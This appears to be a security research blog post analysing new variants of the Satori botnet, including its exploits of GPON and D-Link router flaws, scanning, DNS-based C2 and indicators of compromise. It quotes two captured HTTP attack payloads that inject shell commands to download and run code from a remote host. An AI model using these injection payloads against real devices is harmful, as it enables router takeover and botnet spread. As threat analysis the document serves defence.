Botnets never Die, Satori REFUSES to Fade Away
Share this

Botnets never Die, Satori REFUSES to Fade Away

Two days ago, on 2018-06-14, we noticed that an updated Satori botnet began to perform network wide scan looking for uc-httpd 1.0.0 devices. Most likely for the vulnerability of XiongMai uc-httpd 1.0.0 (CVE-2018-10088). The scanning activities led to a surge in scanning traffic on ports 80 and 8000.

About three hours ago, as we were writing this article, the Satori author released yet another update. Which is a worm, targeting for D-Link DSL-2750B device, the exploit was published on 5/25 here.

Satori is a variant of the Mirai botnet. We first discovered this botnet on 2017-11-22. A week later, on 2017-12-05, Satori started to pick up, and infected more than 260,000 home routers within 12 hours. You can see our old blogs here and here.

The security community took joint action soon. Multiple ISPs blocked the main Satori port 37215 in their networks. But satori did not stop.

On 2018-01-08, we discovered that Satori has a successor Satori.Coin.Robber which tried to re-establish the botnet on ports 37215 and 52869. This new variant began to infiltrate the existing Claymore Miner mining devices on the internet by attacking their 3333 management port and replacing the wallet addresses. This is the first time we noticed botnets replace wallets addresses. You can see our old blog here.

On 2018-05-10, another Satori variant joined the party for the vulnerable GPON devices (CVE-2018-10561, CVE-2018-10562). And Satori quickly kicked out other competitors in a short period of time and became the strongest player in the "GPON Zombie Party." You can see 4th blog about Satori here.

And now we are looking at our 5th Satori blog …

Satori Updates in the Past Few Days

The core sample of Satori's recent activities is as follows:


The exploited vulnerability was GPON (CVE-2018-10561). The attack Payload was:

POST /GponForm/diag_Form?images/ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+hxxp://>/tmp/r;sh+/tmp/r&ipv=0

In this sample:

  • Information collection and reporting: The botnet scans the Internet, looking for the IP address that has the fingerprint of “uc-httpd 1.0.0”, and report the collected IP address to This IP is dynamic configured in r[.] DNS TXT record.
  • The C2: The C2 communication protocol is different from the previous versions
  • DDoS attack capability: four DDoS attack vectors are supported, including udp_flood, syn_flood, tcp_ack_floodand gre_flood

This new variant has already launched at least two DDoS attacks. The details of the attack are as follows:

  • 2018-06-13 21:09:00 : TCP_ACK_FLOOD->(
  • 2018-06-14 23:00:00 : UDP_FLOOD -> (

This two attacks, were also logged by our DDosMon system, respectively observed 1 and observed 2 .

The Recent 80 and 8000 Ports Scan Traffic Upticks

This new variant caused scan traffic upticks on ports 80 and 8000, as can be seen on our ScanMon system, the two traffic growth start times are 2018-06-09 and 2018-06-14 respectively.

The traffic growth on these two ports is caused by the Satori sample and its updated version:

  • Port 80: The first packet in the scan traffic is the GET / HTTP/1.0 same as the payload we observed in the sample;
  • Port 8000: The first packet in the scan traffic is the GET / HTTP/1.0 same as the payload we observed in the sample;

Homology Analysis

We determine that these current malicious samples belong to the same Satori family:

  • Same C2 IP Address: the IP address is a new sample’s Downloader (hxxp:// This IP address is also the Downloader address used by Satori in the previous GPON Zombie Party.
  • Code similarity: A decryption code borrowed from MIRAI was used in Satori's okiru variant. Now this code is also used in the new sample.

The above two figures show the encrypted code fragments from:

  • Satori samples in this round:F8D1D92E9B74445F2A0D7F1FEB78D639
  • Previous Satori Okiru branch : 0D39BF8EE7AC89DEC5DD8E541A828E15

Satori is Collecting the IP Address of the uc-httpd 1.0.0 Devices

Satori is collecting the IP address of the device fingerprint "uc-httpd 1.0.0" by scanning the 80/8000 port on the internet. The relevant pseudo code is as follows. Once a matching target is found, its IP is reported to

This IP address is dynamic configured in domain DNS TXT record. In this way, the author can freely change the C2 IP address in the cloud, avoiding hard-coding in sample.

Satori Current Updates

Three hours ago, at 2018-06-15 07:00:00, Satori had another update. This time the update is a worm.

  • Vulnerability: A remote command execution vulnerability on D-Link DSL-2750B
  • Exploit: Disclosed on May 25th
  • Scanning Port: 80 and 8080
  • It is Worm now: The exploit appears in both payload attacking our honeypot and the malware sample it delivers, it propagates as a worm now.
  • C2: 95.215.62[.]169:5600. The IP address is configured in the DNS TXT record of domain

Malware samples:

e0278453d814d64365ce22a0c543ecb6    hxxp://
b288d2f404963fbc7ab03fcb51885cc3    hxxp://
78191f8f942b8c9b3b6cceb743cefb03    hxxp://
753cbfec2475be870003a47b00e8e372    hxxp://
0a44d64fdf9aebfedf433fb679b8b289    hxxp://

The attack payload hitting our honeypot:

GET /login.cgi?cli=aa aa';wget hxxp:// -O -> /tmp/r;sh /tmp/r'$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

The attack payload appears in the sample at the same time:

IoC          Satori Downloader   Satori Report              Satori Reporter listed in this host's DNS TXT record      Satori C2              Satori C2 listed in this host's DNS TXT record

Satori Malware Sample md5